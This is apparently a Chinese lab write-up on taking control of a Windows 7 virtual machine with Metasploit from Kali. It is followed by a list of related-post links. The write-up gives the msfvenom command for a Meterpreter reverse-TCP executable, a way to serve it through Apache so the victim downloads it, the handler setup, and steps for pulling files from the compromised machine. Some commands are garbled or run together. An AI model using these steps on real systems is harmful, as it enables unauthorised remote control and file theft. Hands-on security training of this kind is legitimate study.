文章目录

  • 一、实验环境
  • 二、实验内容
    • 1、生成主控端、被控端。
    • 2、获得靶机(Windows)控制权。
    • 3、下载靶机上任意一个文件。
  • 三、实验步骤

一、实验环境

kali虚拟机,靶机win7,(都为NAT模式)

二、实验内容

1、生成主控端、被控端。

2、获得靶机(Windows)控制权。

3、下载靶机上任意一个文件。

三、实验步骤

(1)在kali生成被控端
打开kali终端输入命令,在本地生成攻击荷载

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.47.128 lport=5000 -f exe -o /root/payload.exe



生成完毕,在将该荷载放到目标靶机上,此时kali就是主控端,靶机是被控端。
PS:在把荷载复制到目标靶机上的时候,可以先把它移动到主机,在从主机移动到靶机;也可以在kali搭建一个网站,将下载链接挂上去,再用靶机去访问这个网站,从而下载下来。(记录一下第二个方法的步骤)
①先在终端查看荷载的存放位置,输入命令ls;

②将荷载的目录地址复制过来,挂到网页上,文件名是 1.exe

命令:cd ./payload/var/www/html/1.exe


③输入命令:

service apache2 start
service apache2 status
cd /var/www/html
ls


④在kali的浏览器里输入环回地址:127.0.0.1/1.exe

⑤最后去靶机的浏览器输入命令:192.168.47.128/1.exe 即可下载

(2)获得靶机(Windows)的控制权
1.打开kali终端,输入msfconsole命令即可打开Metasploit

2.使用攻击模块
输入命令:

 use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.47.128set lport 5000exploit


3.然后打开靶机,多次点击攻击荷载,此时kali已经开始监听靶机的行为,我们从网上下载一张图片,下载了以后,在kali也会出现靶机所下载的内容


(3)下载靶机上的任一文件
1.我们直接下载刚刚靶机下载的那种图片即可,输入download命令

2.最后打开kali的文件夹,输入下载的图片的存放目录/home/,找到了靶机下载的那张图片,我们已经将他下载下来,复现完毕!

【简单远程控制】 Metasploit应用相关推荐

  1. 简单远程控制 Metasploit应用

    二.Metasploit应用 1.生成主控端.被控端. 2.获得靶机(Windows)控制权. 3.下载靶机上任意一个文件. P121-123;140-149 在kali中输入命令 msfvenom  ...

  2. Qt:Qt实现Winsock网络编程—非阻塞模式下的简单远程控制的开发(WSAAsyncSelect)

    Qt实现Winsock网络编程-非阻塞模式下的简单远程控制的开发(WSAAsyncSelect) 前言 这边博客应该是 Qt实现Winsock网络编程-TCP服务端和客户端通信(多线程) 的姐妹篇,上 ...

  3. Ubuntu的简单远程控制和远程桌面

    安全方便的简单控制-ssh 安装服务器:apt-get ssh,服务器基本不用怎么配置就可以使用. 客户端一版不用安装,Linux都自带了,windows平台下可以使用putty ,非常好用. 操作命 ...

  4. linux搭建服务器ppt,Linux服务器远程控制搭建.ppt

    <Linux服务器远程控制搭建.ppt>由会员分享,可在线阅读,更多相关<Linux服务器远程控制搭建.ppt(14页珍藏版)>请在装配图网上搜索. 1.企业服务器远程控制搭建 ...

  5. 20169220 网络攻防实践 第二周学习总结

    20169220 赵京鸣 2016/2017-2 第二周学习总结 进度:1.教材第1-2章/12章 2.Kali教学视频1-5/36 3.查找2个安全工具/5 4.国内外黑客.电影书籍了解 5.lin ...

  6. 将文件从 Linux 传输到 Windows

    很多时候,在参与活动中,我发现自己需要将工具或有效载荷从我的Kali linux攻击箱复制到受损的Windows机器上. ColdFusion服务器,并能够上传一个CFM webshell.这是一个非 ...

  7. 小度音箱对接之小度APP功能分析

    本文,旨在分析小度APP中,关于智能控制相关的功能. 文中,以美的美居为例. 文章目录 小度APP介绍 首页栏目 技能栏目 VIP栏目 小度购栏目 我的栏目 智能家居模块 添加设备 设备控制 小结 小 ...

  8. Metasploit Framework(1)基本命令、简单使用

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 基本的控制台命令介绍: banner 查看metasp ...

  9. 从入门到入土:基于C语言采用UDP协议实现远程控制|详细说明|利用流套接字实现一个简单的远程控制系统|代码展示

    此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益.不合适引用,自当删除! 若 ...

最新文章

  1. Windows下安装XAMPP,Wordpress
  2. Flask开发服务器启动方式
  3. 深度学习框架简史 (A Brief History of Deep Learning Frameworks)
  4. https://github.com/fendouai/Awesome-Chatbot
  5. UPS不间断电源常见故障及如何排除故障
  6. 笔记-信息化与系统集成技术-智慧城市建设参考模型
  7. Spring Boot——易班优课YOOC课群在线测试自动答题解决方案(六)后端改造
  8. 深入C#中的String类
  9. 别把机器学习和人工智能搞混了! 1
  10. VS 15 预览 5 中 VB 15 新增的功能
  11. C++多态虚函数/纯虚函数demo
  12. linux退出热键_LINUX常用快捷键
  13. 抽象代数学习笔记(抽象代数的历史、运算)
  14. C语言的printf输出格式控制
  15. Snaker的回退流程源码分析
  16. 有没有测试适合哪种发型的颜色软件,染发小测试 看看你的头发适合哪种颜色...
  17. windows 重置路由表
  18. VScode 常用必备插件
  19. 侯捷C++学习记录-面向对象高级编程上
  20. AntiVir UNIX 在Ubuntu 8.04下的安装

热门文章

  1. Win7电脑无法进入睡眠模式?
  2. Matlab如何绘制小提琴图?
  3. mac安装jekyll
  4. 使用Jekyll + GitHub 搭建自己的博客
  5. 爆火书单视频怎么制作?实用制作教程来了
  6. 游戏获取服务器信息,易语言获取游戏服务器信息
  7. 工信部:将实施国家软件重大工程解决关键软件“卡脖子”问题丨权威发布
  8. vue解析excel文件(使用xlsx)
  9. dilated convolution
  10. 编程语言python这个词怎么翻译_五大理由从 Python 转到 Go 语言【已翻译100%】...